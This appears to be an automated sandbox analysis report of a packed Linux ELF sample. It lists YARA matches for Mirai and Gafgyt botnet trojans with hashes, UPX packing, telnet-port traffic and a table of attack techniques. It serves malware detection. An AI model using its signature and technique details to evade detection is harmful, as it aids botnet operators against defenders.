    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5510, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5511, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5516, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: LOAD without section mappingsProgram segment: 0x100000
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
    Source: 5510.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5510, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5511, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: Process Memory Space: m1vvw0vLkD.elf PID: 5516, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
    Source: classification engineClassification label: mal76.troj.evad.linELF@0/0@0/0

    Data Obfuscation

    barindex
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57868
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58238
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57868
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58504
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59258
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59766
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59770
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60468
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 32780
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 32788
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33236
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33242
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34228
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34648
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34656
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57290
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57750
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57758
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58152
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58604
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58992
    Source: m1vvw0vLkD.elfSubmission file: segment LOAD with 7.9513 entropy (max. 8.0)

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
    Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception11
    Obfuscated Files or Information
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
    Non-Standard Port
    SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
    Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Data Encrypted for ImpactDNS ServerEmail Addresses
